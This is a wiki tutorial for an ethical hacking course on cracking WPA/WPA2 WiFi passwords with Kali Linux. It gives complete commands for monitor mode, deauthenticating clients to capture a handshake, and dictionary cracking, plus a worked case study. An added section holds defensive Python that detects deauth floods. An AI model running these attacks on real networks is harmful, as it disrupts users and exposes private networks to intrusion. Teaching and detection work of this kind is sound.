Hands-on: Attack Wireless Network and Cracking WiFi Password (en)

From OnnoWiki

Here is a detailed explanation and example of attacking wireless networks and cracking WiFi passwords using Kali Linux 2024.3, for an ethical hacking college course:

Prerequisites (tools and software):

  • Kali Linux 2024.3 already installed.
  • WiFi adapter that supports monitor mode (example: Alfa AWUS036NHA).
  • Tools:
    • `airmon-ng` (enable monitor mode)
    • `airodump-ng` (capture packets)
    • `aireplay-ng` (inject packets)
    • `aircrack-ng` (crack WiFi passwords)

Hands-on Steps:

1. Activate Monitor Mode on WiFi Adapter

  • First, bring up the WiFi adapter and make sure it is detected by the system:

ifconfig

  • Run the following command to enable monitor mode:

sudo airmon-ng start wlan0

    • Note: Replace `wlan0` with the name of your WiFi interface. This puts the adapter into monitor mode, allowing it to capture all WiFi traffic around it. If `airmon-ng` reports processes that could interfere (such as NetworkManager), stop them before continuing.

2. Capture Network Traffic with `airodump-ng`

  • Use `airodump-ng` to capture WiFi packets around you:

sudo airodump-ng wlan0mon

    • `wlan0mon` is the name of the interface that is in monitor mode. This command lists the SSIDs, BSSIDs, channels, and other information about the networks around you.

3. Targeting Networks and Capturing Handshakes

  • After looking at the target networks (SSID/BSSID), focus on one network with the following command:

sudo airodump-ng --bssid <BSSID_target> -c <channel> -w capture wlan0mon

    • `<BSSID_target>` is the MAC address of the access point and `<channel>` is its WiFi channel number. The captured packets are saved to files with the prefix `capture` (the first capture file is `capture-01.cap`).
  • To capture the handshake (the WPA/WPA2 4-way authentication exchange), perform a deauthentication attack against a connected client:

sudo aireplay-ng --deauth 10 -a <BSSID_target> -c <client_MAC> wlan0mon

    • This disconnects the client; when the client reconnects, `airodump-ng` captures the handshake and shows `WPA handshake: <BSSID_target>` in the top-right corner of its display.

4. Cracking WiFi Password with `aircrack-ng`

  • After successfully getting the handshake, you can crack the password with a dictionary attack using `aircrack-ng`:

sudo aircrack-ng -w /path/to/wordlist.txt -b <BSSID_target> capture-01.cap

    • `/path/to/wordlist.txt` is the location of the wordlist (e.g. `rockyou.txt`), and `capture-01.cap` is the file containing the handshake. Aircrack-ng tries every word in the wordlist against the handshake; the password is recovered only if it appears in the list.

Case Study

Suppose we have the following information:

  • Target network BSSID: `00:11:22:33:44:55`
  • Channel: 6
  • Wordlist file: `/usr/share/wordlists/rockyou.txt`

Steps:

  • Run `airodump-ng` and target the network:

sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 -w capture wlan0mon

  • Perform a deauth attack against the connected client `AA:BB:CC:DD:EE:FF`:

sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon

  • After the handshake is captured, crack the password:

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 00:11:22:33:44:55 capture-01.cap

If the password is in the wordlist, the output will display the WiFi password.
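As a defender-side complement to the deauthentication step above, here is an added example (not from the original page or the aircrack-ng project) that parses raw 802.11 frames and flags a burst of deauthentication frames claiming a single BSSID, which is what the `aireplay-ng --deauth` step looks like to a wireless IDS. It assumes radiotap headers have already been stripped; the frames, the alert threshold and the second access point address are constructed for illustration.

```python
import struct
from collections import Counter

MGMT_TYPE = 0
DEAUTH_SUBTYPE = 12      # 802.11 management subtype 1100b = deauthentication
DEAUTH_THRESHOLD = 5     # assumed alerting threshold per BSSID

def mac_str(raw: bytes) -> str:
    """Format 6 raw bytes as AA:BB:CC:DD:EE:FF."""
    return ":".join(f"{b:02X}" for b in raw)

def parse_80211(frame: bytes):
    """Parse the MAC header of a raw 802.11 frame (radiotap header already
    stripped). Returns a dict, or None if the frame is shorter than a header."""
    if len(frame) < 24:
        return None
    fc = frame[0]
    info = {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "addr1": mac_str(frame[4:10]),   # receiver address
        "addr2": mac_str(frame[10:16]),  # transmitter address
        "addr3": mac_str(frame[16:22]),  # BSSID for management frames
        "reason": None,
    }
    if info["type"] == MGMT_TYPE and info["subtype"] == DEAUTH_SUBTYPE and len(frame) >= 26:
        # Deauth body: 2-byte little-endian reason code right after the header
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info

def detect_deauth_flood(frames, threshold=DEAUTH_THRESHOLD):
    """Count deauth frames per claimed BSSID; return those at or above threshold."""
    counts = Counter()
    for f in frames:
        p = parse_80211(f)
        if p and p["type"] == MGMT_TYPE and p["subtype"] == DEAUTH_SUBTYPE:
            counts[p["addr3"]] += 1
    return {bssid: n for bssid, n in counts.items() if n >= threshold}

def build_frame(fc0, addr1, addr2, addr3, body=b""):
    """Pack a minimal 802.11 frame: FC, duration, 3 addresses, seq ctrl, body (sample data only)."""
    macs = b"".join(bytes.fromhex(m.replace(":", "")) for m in (addr1, addr2, addr3))
    return bytes([fc0, 0x00]) + b"\x00\x00" + macs + b"\x00\x00" + body

AP, CLIENT = "00:11:22:33:44:55", "AA:BB:CC:DD:EE:FF"   # from the case study
OTHER_AP = "66:77:88:99:AA:BB"                          # constructed second AP
# Constructed sample: beacon, data frame, one benign deauth, then ten spoofed deauths.
SAMPLE_FRAMES = [build_frame(0x80, "FF:FF:FF:FF:FF:FF", AP, AP), build_frame(0x08, AP, CLIENT, AP),
                 build_frame(0xC0, CLIENT, OTHER_AP, OTHER_AP, struct.pack("<H", 3))]
SAMPLE_FRAMES += [build_frame(0xC0, CLIENT, AP, AP, struct.pack("<H", 7)) for _ in range(10)]
```

Running `detect_deauth_flood(SAMPLE_FRAMES)` reports only the case-study BSSID (10 deauth frames); the single benign deauth from the other access point stays below the threshold.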

Ethics and Legality

Keep in mind that performing unauthorized WiFi attacks is illegal. This should only be done in a controlled testing environment, such as a lab or a private network with the owner's consent.

Interesting Links